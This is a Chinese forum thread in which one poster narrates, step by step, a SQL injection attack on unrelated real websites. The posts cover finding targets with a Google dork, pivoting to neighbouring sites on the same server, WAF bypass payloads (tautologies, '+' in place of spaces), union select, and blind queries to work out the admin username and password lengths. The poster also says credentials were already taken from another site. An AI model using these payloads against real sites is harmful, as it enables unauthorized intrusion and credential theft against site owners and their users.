[直播][盲注]旁站渗透实例_葫芦侠3楼

丨$-.-$丨 1楼 04月16日

一楼我的[滑稽]

SYSTEM_M 2楼 04月16日

欢迎欢迎。

丨$-.-$丨 3楼 04月16日

感谢楼主送来的葫芦[玫瑰]，多多益善[滑稽]

苦口 4楼 04月16日

前排[哈哈][茶杯]

无伤大大 5楼 04月16日

来报道了[滑稽]

SYSTEM_M 6楼 04月16日

1. 打开科学上网进入谷歌
搜索语法：
公司inurl:.php?id=
随便找一个点个站发现可注入

【Rain】楚昊 7楼 04月16日

楼主好慢。

SYSTEM_M 8楼 04月16日

2. 通过一番手注
得到了上述的一个网站的账号密码但后台没找到只能放弃获得更高权限了。

SYSTEM_M 9楼 04月16日

3.正题开始
拿着上步网站进入站长工具查询旁站
发现还真有不少旁站。

SYSTEM_M 10楼 04月16日

4.开始一个一个来点开链接进行测试对网站进行逐一排查

SYSTEM_M 11楼 04月16日

5.找到两个站翻了前几个链接恰巧运气好找到了一个存在注入的asp的站

测试形式：
URL and 1=1 (发现拦截)

无伤大大 12楼 04月16日

我想要的内容来了

SYSTEM_M 13楼 04月16日

6. 这个waf版本低点的的有个通病
更改语句：
URL and -1=-1 (绕过防护)
URL and -1=-2 (页面回现不正常)
判断存在注入

SYSTEM_M 14楼 04月16日

7.继续拼接语句
查询是否存在admin表
URL and exists(select * from admin)

继续拦截。

无伤大大 15楼 04月16日

这是不是叫关键词拦截？

SYSTEM_M 16楼 04月16日

8. 判断拦截项：
URL and exists 不拦截
URL and exists (select) 不拦截
URL and exists (select ) 发现select后加了一空格就开始拦截了

更改语法：
URL and exists (select+* from admin) 页面回现正常很幸运存在admin表

SYSTEM_M 17楼 04月16日

看情况吧至少这个waf没有过滤关键词

SYSTEM_M 18楼 04月16日

9.非常幸运
URL and exists (select+username from admin) 页面回现正常
URL and exists (select+password from admin) 页面回显正常

上面两句说明admin表中存在username 和password两个字段

幸好是常规的表和字段不然sqlmap也用不了还得靠我猜累死了。。

第八步好像没解释这个加号 select后面的空格用加号代替从而绕过waf

SYSTEM_M 19楼 04月16日

10.order by 直接查字段
链接形式：
URL order by 27 查出来有27个字段

接着联合查询
链接形式：
URL union select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from admin
意外发生提示错误
错误提示：内容不能更新对象只读
意思好像权限不足吧

SYSTEM_M 20楼 04月16日

11.没办法再试试盲注吧想想后面要在手机上手注头都发麻

测试username内容长度
链接形式：
URL and (select top 1 len(username) from admin)>5
意思是查询username内容有几位最后的>5
是判断是不是长度大于5

测试结果：
and (select top 1 len(username) from admin)=6
说明username内容有六位

接下来同理
判断密码长度
URL and (select top 1 len(password) from admin)=16
直接试=16 因为一般密码会用md5加密所以可能要么是16位要么是32位

这里得出密码内容有16位